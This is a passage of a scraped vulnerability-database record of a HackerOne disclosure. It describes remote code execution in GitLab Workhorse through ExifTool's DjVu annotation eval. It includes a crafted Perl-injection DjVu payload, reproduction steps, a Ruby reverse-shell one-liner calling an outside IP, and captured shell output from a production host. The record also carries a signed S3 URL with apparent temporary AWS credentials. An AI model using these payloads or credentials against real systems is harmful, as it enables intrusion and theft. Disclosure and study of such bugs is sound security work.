0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-14T21:29:47", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-14T20:30:46", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-14T20:30:46", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQRSHORSM3%2F20210514%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210514T212946Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGsaCXVzLXdlc3QtMiJHMEUCIQDVLnOayk4dnt2IQWgpV2ra5A7NUT5DlSpIaRczXO8ekQIgJwhRG7%2BwtCq4CWbpO58iJCNUxTHHr5eN%2BZLBBSbr12kqgwQI9P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARACGgwwMTM2MTkyNzQ4NDkiDIvaDkw5qXo%2BFanZLirXAyQndX5hMkHqWHLvEETYUkv%2BjPkz8R1lYZn3Ul8KRUA3%2BpaDX7txmDfw0gKBXLoAUtxY3GGR1YIlGqhiepRBDx4hQlsS3VNYndzSQYk6Ab3ua0VI8taYdSyi0Rzuysv7gXKCNdUFbShaDGygUCilBIX0r3a2BXxGW3ydxQmkWsugqYvvJl6z3EZn9g2CEQzqZlizBlHhKzRw4pitAhOaFRS6vcpNALzlnX7T2%2B%2FjwDwxDBm5dVkm0NXH6nhEc6GkZak6m%2BSZcG%2FHgEzJb4%2BOvDExSB%2F2URdmCjf%2Bq%2FDecht7jsMz1qA2rP9MeYipVX4riJE8BXEtknfiB7ZyqyqeKjpL4z%2BVolDmjGwOCurP250A4CM4FiwZXII3kDOQfItRH1Du392iyN86U0sTzsZEhEbzDEG5lkFCFXO0sPNk%2B1NjY98AtNSYxixzCHmd3laoOReBttcqSymknqmHClTIhXYHhDKm31rhpPg3ItHFla3adHUzj4JUuerbuBsa%2FKWo3B9tnnH4dmfPJOx3Rixa2fJs6ytZRABujza7shTZixISkuglUdfnRUx2yOELXeCxIy0jm%2Bq7BQOPFMpVw%2FVSPL3pFseFPyMVQPrroYOBJ1i7pxUgF2Gf1zDfkPuEBjqlAf%2Fub5xzQHgddpsMmVjM67O2YhOE81uejkG0dtNSM0UZ9vqrgxzvDfDpcrN6HI83d4TpagJFiR9ZmPz34zqm10nT3ls2kxRj3BwjgylUZXxwwyIwFfbR84%2Fwj3YX1k7j%2FYll%2FffBkPMXKb2AUeG8TJWYksMQWXuigPtleT9P0WHzEcBi7Ys%2FTHWcfllJPbJQdvepKu%2Brg915L5a39b2%2BOgSkKze5Lw%3D%3D&X-Amz-Signature=d2ee2fe791eb9b51c1d0e21c7e31fcaad3c002bdfbe49c32b6d6701476e04cd9"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-14T21:29:47", "differentElements": ["h1reporter"], "edition": 2}, {"bulletin": {"id": "H1:1154542", "hash": "a6630c1e05d51e9688be65351f6d464a", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 